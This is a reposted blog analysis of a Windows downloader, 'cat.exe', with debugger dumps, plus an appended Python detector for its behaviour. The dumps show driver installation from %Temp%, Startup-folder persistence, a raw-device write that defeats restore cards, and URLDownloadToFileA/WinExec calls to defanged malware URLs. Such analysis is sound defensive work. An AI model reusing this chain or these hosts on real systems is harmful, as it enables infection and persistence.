FROM:http://hi.baidu.com/cyto/blog/item/5fcbeafd892f0e41d6887d52.html

cat.exe

Source reference: http://www.scanw.com/blog/?p=5

0. Refer to the description in this article:
http://bbs.micropoint.com.cn/showthread.asp?tid=28056&fpage=1
After the sample is executed, it drops the driver file “~46.tmp” (46 is a random value) into the %Temp% directory, calls the SCM to write the registry and register ~46.tmp as a Windows kernel service named sys_flt, and starts it through the related APIs. Once the service is running it creates the disk device “\Device\yyy2” and the directory object “\Device\zzz”, calls DeviceIoControl with the relevant control codes to obtain the primary DOS partition information and the device number, then closes the handle. It copies itself into Start -> Accessories -> Startup group, opens the device “\Device\yyy2” and passes its own control code 8000F800 through DeviceIoControl to access the physical disk, then uses CopyFileA to copy “%Temp%\~46.tmp” and the virus file in the Startup group into “\\.\yyy2”, with the aim of defeating the restore card. It drops the batch file Deletedll.bat under “%SystemRoot%\System32\”, which when run deletes “%Temp%\~46.tmp” and Deletedll.bat. Finally the virus calls the API function URLDownloadToFileA to download assorted malware from the network to the root of the system disk and executes it.

1. Dropping the file:
00405D52     E8 55E9FFFF              call 004046AC                             ; jmp to kernel32.CreateFileA
00405D8D     E8 2AE9FFFF              call 004046BC                             ; jmp to kernel32.WriteFile
(ASCII “C:\DOCUME~1\gao1\LOCALS~1\Temp\~50.tmp”)

2. Creating the service:
00406165     B8 90614000              mov eax,406190                            ; ASCII “sys_flt”
0040616A     E8 D5EAFFFF              call 00404C44                             ; dumped_.00404C44
0012FEFC    00404CBB   /CALL to CreateServiceA from dumped_.00404CB6
0012FF00    0013CC08   |hManager = 0013CC08
0012FF04    00406190   |ServiceName = “sys_flt”
0012FF08    00406190   |DisplayName = “sys_flt”
0012FF0C    000F01FF   |DesiredAccess = SERVICE_ALL_ACCESS
0012FF10    00000002   |ServiceType = SERVICE_FILE_SYSTEM_DRIVER
0012FF14    00000003   |StartType = SERVICE_DEMAND_START
0012FF18    00000001   |ErrorControl = SERVICE_ERROR_NORMAL
0012FF1C    00C90138   |BinaryPathName = “C:\DOCUME~1\gao1\LOCALS~1\Temp\~50.tmp”
0012FF20    00000000   |LoadOrderGroup = NULL
0012FF24    00000000   |pTagId = NULL
0012FF28    00000000   |pDependencies = NULL
0012FF2C    00000000   |ServiceStartName = NULL
0012FF30    00000000   \Password = NULL

3. Copying to the startup entry:
0012FF38    00406091   /CALL to CopyFileA from dumped_.0040608C
0012FF3C    00C90048   |ExistingFileName = “c:\documents and settings\gao1\”,D7,”",C0,”",C3,”",E6,”\dumped_.exe”
0012FF40    00C92D04   |NewFileName = “C:\Documents and Settings\All Users\”,A1,”",B8,”",BF,”",AA,”",CA,”",BC,”",A1,”",B9,”",B2,”",CB,”",B5,”",A5,”\”,B3,”",CC,”",D0,”",F2,”\”,C6,”",F4,”",B6,”",AF,”\dumped_.exe”
0012FF44    00000000   \FailIfExists = FALSE

00C92D04 43 3A 5C 44 6F 63 75 6D 65 6E 74 73 20 61 6E 64 C:\Documents and
00C92D14 20 53 65 74 74 69 6E 67 73 5C 41 6C 6C 20 55 73   Settings\All Us
00C92D24 65 72 73 5C A1 B8 BF AA CA BC A1 B9 B2 CB B5 A5 ers\「开始」菜单
00C92D34 5C B3 CC D0 F2 5C C6 F4 B6 AF 5C 64 75 6D 70 65 \程序\启动\dumpe
00C92D44 64 5F 2E 65 78 65 00                             d_.exe.

4. Using CopyFileA to copy the virus file from the Startup group into the created device “\\.\yyy2”
004056EF     50                       push eax
004056F0     E8 DFEFFFFF              call 004046D4                             ; jmp to kernel32.CopyFileA
0012FEE8    004056F5   /CALL to CopyFileA from dumped_.004056F0
0012FEEC    00C92D04   |ExistingFileName = “C:\Documents and Settings\All Users\”,A1,”",B8,”",BF,”",AA,”",CA,”",BC,”",A1,”",B9,”",B2,”",CB,”",B5,”",A5,”\”,B3,”",CC,”",D0,”",F2,”\”,C6,”",F4,”",B6,”",AF,”\dumped_.exe”
0012FEF0    00C92E28   |NewFileName = “\\.\yyy2\Documents and Settings\All Users\”,A1,”",B8,”",BF,”",AA,”",CA,”",BC,”",A1,”",B9,”",B2,”",CB,”",B5,”",A5,”\”,B3,”",CC,”",D0,”",F2,”\”,C6,”",F4,”",B6,”",AF,”\dumped_.exe”
0012FEF4    00000000   \FailIfExists = FALSE

00C92D04 43 3A 5C 44 6F 63 75 6D 65 6E 74 73 20 61 6E 64 C:\Documents and
00C92D14 20 53 65 74 74 69 6E 67 73 5C 41 6C 6C 20 55 73   Settings\All Us
00C92D24 65 72 73 5C A1 B8 BF AA CA BC A1 B9 B2 CB B5 A5 ers\「开始」菜单
00C92D34 5C B3 CC D0 F2 5C C6 F4 B6 AF 5C 64 75 6D 70 65 \程序\启动\dumpe
00C92D44 64 5F 2E 65 78 65 00 00                          d_.exe..

00C92E28 5C 5C 2E 5C 79 79 79 32 5C 44 6F 63 75 6D 65 6E \\.\yyy2\Documen
00C92E38 74 73 20 61 6E 64 20 53 65 74 74 69 6E 67 73 5C ts and Settings\
00C92E48 41 6C 6C 20 55 73 65 72 73 5C A1 B8 BF AA CA BC All Users\「开始
00C92E58 A1 B9 B2 CB B5 A5 5C B3 CC D0 F2 5C C6 F4 B6 AF 」菜单\程序\启动
00C92E68 5C 64 75 6D 70 65 64 5F 2E 65 78 65 00 00 00 00 \dumped_.exe….

It is said that this is the part used to bypass the restore card.
I do not really understand the process or the principle behind creating the device \\.\yyy2.

5. Cleanup: unloading the service and deleting the driver
Unloading the service:
004061B1     B8 DC614000              mov eax,4061DC                            ; ASCII “sys_flt”
004061B6     E8 DDEBFFFF              call 00404D98                             ; dumped_.00404D98

Deleting the driver:
00405F6A     E8 55E7FFFF              call 004046C4                             ; jmp to kernel32.DeleteFileA
0012FF70    00405F6F   /CALL to DeleteFileA from dumped_.00405F6A
0012FF74    00C90138   \FileName = “C:\DOCUME~1\gao1\LOCALS~1\Temp\~50.tmp”

6. Downloading files, then exiting:
0040703E     68 D8704000              push 4070D8            ; ASCII “c:\1.exe”
00407043     68 E4704000              push 4070E4            ; ASCII “hxxp://iii.chsip.net/listtt.exe”
00407048     6A 00                    push 0
0040704A     E8 05FFFFFF              call 00406F54           ; jmp to urlmon.URLDownloadToFileA
0040704F     68 D8704000              push 4070D8             ; ASCII “c:\1.exe”
00407054     E8 03FFFFFF              call 00406F5C           ; jmp to kernel32.WinExec

0040705D     68 28714000              push 407128              ; ASCII “c:\2.exe”
00407062     68 34714000              push 407134              ; ASCII “hxxp://test.591jx.com/test.exe”
00407067     6A 00                    push 0
00407069     E8 E6FEFFFF              call 00406F54            ; jmp to urlmon.URLDownloadToFileA
0040706E     68 28714000              push 407128              ; ASCII “c:\2.exe”
00407073     E8 E4FEFFFF              call 00406F5C            ; jmp to kernel32.WinExec
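As an added example (not part of the original post and not the sample's code): a small Python script that turns the behaviour chain above into a behavioural check over a sandbox-style API trace, flagging a driver service registered from %Temp%, a copy into the Startup folder, a copy to a raw `\\.\` device, and execution of a file that was just downloaded. The trace line format, the `analyze`/`parse_call` functions and the download URL are constructed assumptions; the service name sys_flt, the device name yyy2 and the paths are taken from the dump.

```python
import re

# Constructed trace (assumption): the calls from the dump above re-expressed in a
# sandbox-style "Func(arg=value, ...)" format; the download URL is a placeholder.
SAMPLE_TRACE = r'''
CreateServiceA(ServiceName="sys_flt", ServiceType=2, StartType=3, BinaryPathName="C:\DOCUME~1\gao1\LOCALS~1\Temp\~50.tmp")
CopyFileA(ExistingFileName="C:\Documents and Settings\gao1\桌面\dumped_.exe", NewFileName="C:\Documents and Settings\All Users\「开始」菜单\程序\启动\dumped_.exe")
CopyFileA(ExistingFileName="C:\Documents and Settings\All Users\「开始」菜单\程序\启动\dumped_.exe", NewFileName="\\.\yyy2\Documents and Settings\All Users\「开始」菜单\程序\启动\dumped_.exe")
DeleteFileA(FileName="C:\DOCUME~1\gao1\LOCALS~1\Temp\~50.tmp")
URLDownloadToFileA(URL="hxxp://downloader.invalid/listtt.exe", FileName="c:\1.exe")
WinExec(CmdLine="c:\1.exe")
'''

CALL_RE = re.compile(r'^(\w+)\((.*)\)$')
ARG_RE = re.compile(r'(\w+)=(?:"([^"]*)"|(\d+))')      # quoted string or integer argument
TEMP_RE = re.compile(r'\\Temp\\', re.I)                 # %Temp% in short or long path form
STARTUP_RE = re.compile(r'\\(Startup|启动)\\', re.I)     # Startup folder, English or Chinese
DRIVER_TYPES = {1, 2}  # SERVICE_KERNEL_DRIVER, SERVICE_FILE_SYSTEM_DRIVER

def parse_call(line):  # one trace line -> (function name, {arg: value}) or None
    m = CALL_RE.match(line.strip())
    if not m:
        return None
    args = {}
    for am in ARG_RE.finditer(m.group(2)):
        args[am.group(1)] = am.group(2) if am.group(2) is not None else int(am.group(3))
    return m.group(1), args

def analyze(trace):  # returns (tag, detail) findings in trace order
    findings, downloaded = [], set()
    for line in trace.strip().splitlines():
        parsed = parse_call(line)
        if not parsed:
            continue
        func, a = parsed
        if func == 'CreateServiceA' and a.get('ServiceType') in DRIVER_TYPES \
                and TEMP_RE.search(a.get('BinaryPathName', '')):
            findings.append(('driver_service_from_temp', a['ServiceName']))
        elif func == 'CopyFileA':
            dst = a.get('NewFileName', '')
            if dst.startswith('\\\\.\\'):             # \\.\<device>\... means a raw device write
                findings.append(('copy_to_raw_device', dst.split('\\')[3]))
            elif STARTUP_RE.search(dst):
                findings.append(('startup_folder_persistence', dst))
        elif func == 'URLDownloadToFileA':
            downloaded.add(a.get('FileName', '').lower())
        elif func == 'WinExec' and a.get('CmdLine', '').lower() in downloaded:
            findings.append(('exec_downloaded_file', a['CmdLine']))
    return findings
```

Any one finding alone is only a weak signal; the value is in the combination of a driver loaded from %Temp% followed by a write to a non-standard `\\.\` device name, which is what the restore-card bypass relies on.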
